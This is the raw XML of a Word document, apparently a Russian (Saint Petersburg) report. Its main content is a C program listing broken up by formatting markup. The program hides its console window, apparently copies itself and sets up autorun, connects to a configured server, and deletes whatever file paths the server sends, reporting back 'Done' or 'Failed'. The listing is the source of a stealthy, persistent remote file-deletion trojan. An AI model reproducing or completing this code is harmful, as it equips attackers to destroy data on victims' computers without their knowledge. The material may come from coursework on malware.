    <w:p w14:paraId="170E98A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ShowWindow(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GetConsoleWindow(),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SW_HIDE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60266A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ProcedureCopy(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27F7E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ProcedureAutorun(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95ECC8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4D884C6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WSADATA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Ws;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A68D5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erStat;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A44A978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7261E42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erStat =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WSAStartup(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MAKEWORD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(2, 2), &amp;Ws);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C63B69F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erStat !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= 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4861DA2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puts(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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"WSAStartup failed"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CFA4B9A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14:paraId="59333972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1D2FB6D6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860336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SOCKET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ClientSock =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socket(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AF_INET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SOCK_STREAM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, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123615CC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EEEB28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(ClientSock ==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INVALID_SOCKET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BC03246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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275591F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closesocket(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ClientSock);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CE08E7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WSACleanup(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3383AA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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2F872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2D61365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56D9606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sockaddr_in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servInfo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58211A6D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ZeroMemory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&amp;servInfo,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(servInfo));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FFB4EC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servInfo.sin_family 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AF_INET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CC75BC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servInfo.sin_port =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htons(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PORT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2CD8962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servInfo.sin_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addr.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s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_addr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inet_addr(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IPV4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1C5781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55E712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FilePath[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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LENGTH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1E8E9D5E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erStat = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6037F47D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(erStat) erStat =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connect(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ClientSock, (</w:t>
      </w:r>
      <w:r w:rsidRPr="001A38A1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sockaddr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*)&amp;servInfo,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(servInfo));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAB5B57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(1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DC0315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memset(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FilePath,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LENGTH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06EF460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recv(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ClientSock, FilePath,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LENGTH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0) !=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SOCKET_ERROR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strstr(FilePath,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":\\"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!=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7BA1E61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erStat = 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remove(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FilePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0594D8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(erStat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2BDFD6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send(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ClientSock,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"Failed"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, (strlen(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"Failed"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+ 1) *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), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7036E583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50FCB74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send(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ClientSock,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"Done"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, (strlen(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"Done"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+ 1) *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), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FCD42B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036443DA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88BA796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((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strstr(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FilePath,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":\\"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==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&amp;&amp; (strstr(FilePath,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"End"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!=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)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A8F178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send(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ClientSock,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"End"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, (strlen(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"End"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+ 1) *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), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C44697A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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778F41D6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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDDAABF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strstr(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FilePath,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"End"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==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strstr(FilePath,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":\\"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== </w:t>
      </w:r>
      <w:r w:rsidRPr="001A38A1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BEC52E7" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRP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send(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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ClientSock, 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"Incorrect path"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, (strlen(</w:t>
      </w:r>
      <w:r w:rsidRPr="001A38A1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Incorrect path"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+ 1) * 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1A38A1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</w:t>
      </w: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>), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443548E0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A38A1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B3994DD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7B10B3CE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closesocket(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ClientSock);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACED7A7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WSACleanup(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C33F835" w14:textId="77777777" w:rsidR="001A38A1" w:rsidRDefault="001A38A1" w:rsidP="00187B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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06002FE1" w14:textId="70C60196" w:rsidR="001A38A1" w:rsidRPr="001A38A1" w:rsidRDefault="001A38A1" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine="0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sectPr w:rsidR="001A38A1" w:rsidRPr="001A38A1" w:rsidSect="00775CD0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134" w:right="851" w:bottom="1134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392FCD" w14:textId="77777777" w:rsidR="00C6250F" w:rsidRDefault="00C6250F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="39750D55" w14:textId="77777777" w:rsidR="00C6250F" w:rsidRDefault="00C6250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06E20" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162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6A73D" w14:textId="77777777" w:rsidR="006162C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4D11A1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3C8BB" w14:textId="77777777" w:rsidR="006162C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86"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:right="1127"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t>Санкт-Петербург</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="092882C2" w14:textId="28EDD8A0" w:rsidR="006162C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86"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:right="1127"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t>202</w:t>
    </w:r>
    <w:r w:rsidR="004D11A1"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9F8EE3" w14:textId="77777777" w:rsidR="00C6250F" w:rsidRDefault="00C6250F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0A017C92" w14:textId="77777777" w:rsidR="00C6250F" w:rsidRDefault="00C6250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E82BC" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162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18BD22" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162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7CF27" w14:textId="77777777" w:rsidR="006162CC" w:rsidRDefault="006162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96049"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B6C56BA"/>
    <w:lvl w:ilvl="0" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2380" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04190019">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3100" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0419001B">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3820" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4540" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04190019">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5260" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0419001B">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="5980" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0419000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6700" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04190019">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7420" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0419001B">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="8140" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1CFD5C4E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C324C454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717661C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15D4D1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687855"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6DE2EB0A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a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abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2BB50554"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="098C7D88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2F0C2383"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="494670F8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303A5B2D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="538EE8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4605C90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A2FAFAEE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="20"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="432"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="576"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1008" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1152" w:hanging="864"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1296" w:hanging="1008"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1152"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1584" w:hanging="1296"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1728" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1872" w:hanging="1584"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1869832599">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1070615328">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="337972987">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2065058252">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="651103116">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="49302964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46187290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0969694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1871344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147010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5739213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3387104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38799785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357120511">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="498616855">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="145590317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733526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42122403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62CC"/>
    <w:rsid w:val="00023B0A"/>
    <w:rsid w:val="000309C2"/>
    <w:rsid w:val="00056ABB"/>
    <w:rsid w:val="000B618B"/>
    <w:rsid w:val="00143759"/>
    <w:rsid w:val="0014625C"/>
    <w:rsid w:val="001508E9"/>
    <w:rsid w:val="00187B79"/>
    <w:rsid w:val="001A38A1"/>
    <w:rsid w:val="001F7336"/>
    <w:rsid w:val="00240C21"/>
    <w:rsid w:val="0026490E"/>
    <w:rsid w:val="002D5B1E"/>
    <w:rsid w:val="00321F95"/>
    <w:rsid w:val="00427460"/>
    <w:rsid w:val="004C7817"/>
    <w:rsid w:val="004D11A1"/>
    <w:rsid w:val="004E1B96"/>
    <w:rsid w:val="0050170E"/>
    <w:rsid w:val="0051231C"/>
    <w:rsid w:val="00513B5C"/>
    <w:rsid w:val="00552449"/>
    <w:rsid w:val="00595998"/>
    <w:rsid w:val="005D5E0E"/>
    <w:rsid w:val="006162CC"/>
    <w:rsid w:val="006179D7"/>
    <w:rsid w:val="00680EF3"/>
    <w:rsid w:val="006A5F64"/>
    <w:rsid w:val="00713B10"/>
    <w:rsid w:val="00775CD0"/>
    <w:rsid w:val="007E676C"/>
    <w:rsid w:val="007F340C"/>
    <w:rsid w:val="00913D1B"/>
    <w:rsid w:val="009329A2"/>
    <w:rsid w:val="00A24106"/>
    <w:rsid w:val="00B10BF4"/>
    <w:rsid w:val="00BE5FA6"/>
    <w:rsid w:val="00C0203F"/>
    <w:rsid w:val="00C045FB"/>
    <w:rsid w:val="00C13ABB"/>
    <w:rsid w:val="00C6250F"/>
    <w:rsid w:val="00C62E13"/>
    <w:rsid w:val="00CC4DBD"/>
    <w:rsid w:val="00D75363"/>
    <w:rsid w:val="00E044E7"/>
    <w:rsid w:val="00E075EC"/>
    <w:rsid w:val="00E53682"/>
    <w:rsid w:val="00EE24DD"/>
    <w:rsid w:val="00F00631"/>
    <w:rsid w:val="00F00755"/>
    <w:rsid w:val="00F0465E"/>
    <w:rsid w:val="00F243D8"/>
    <w:rsid w:val="00F426D0"/>
    <w:rsid w:val="00F94509"/>
    <w:rsid w:val="0DB698D7"/>
    <w:rsid w:val="19C2794E"/>
    <w:rsid w:val="1AAB19B9"/>
    <w:rsid w:val="261F60A5"/>
    <w:rsid w:val="6FF332AA"/>
    <w:rsid w:val="7102AF11"/>
    <w:rsid w:val="757A3793"/>
    <w:rsid w:val="7774C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B9335E"/>
  <w15:docId w15:val="{CBCC357E-D05F-BC40-B610-97C194A60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0070E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00C53ADA"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="567"/>
      </w:tabs>
      <w:ind w:left="0" w:firstLine="851"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:link w:val="21"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00BE19C9"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="810"/>
      </w:tabs>
      <w:ind w:left="0" w:firstLine="851"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="3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BE19C9"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1134"/>
        <w:tab w:val="left" w:pos="1701"/>
      </w:tabs>
      <w:ind w:left="0" w:firstLine="851"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:szCs w:val="2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384ECC"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="851"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i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384ECC"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="851"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:szCs w:val="26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F52F00"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:link w:val="70"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="5"/>
      </w:num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8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:link w:val="80"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:link w:val="90"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria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link w:val="a5"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="0093477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6">
    <w:name w:val="Название рисунка"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:keepLines/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a7">
    <w:name w:val="Название таблицы"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00BE19C9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a5">
    <w:name w:val="Заголовок Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="009347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8">
    <w:name w:val="Программный код"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:uiPriority w:val="3"/>
    <w:qFormat/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a9">
    <w:name w:val="Текст внутри таблицы"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="32"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="Заголовок 4 Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00384ECC"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="Заголовок 5 Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00384ECC"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="Заголовок 6 Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:rsid w:val="00F52F00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70">
    <w:name w:val="Заголовок 7 Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:rsid w:val="00F52F00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basedOn w:val="a1"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:rsid w:val="00F52F00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90">
    <w:name w:val="Заголовок 9 Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="9"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:rsid w:val="00F52F00"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
    <w:name w:val="НИР нумерованный список"/>
    <w:basedOn w:val="a0"/>
    <w:locked/>
    <w:rsid w:val="002E373A"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-">
    <w:name w:val="НИР-простой список"/>
    <w:basedOn w:val="a0"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00985035"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:ind w:left="720" w:hanging="720"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
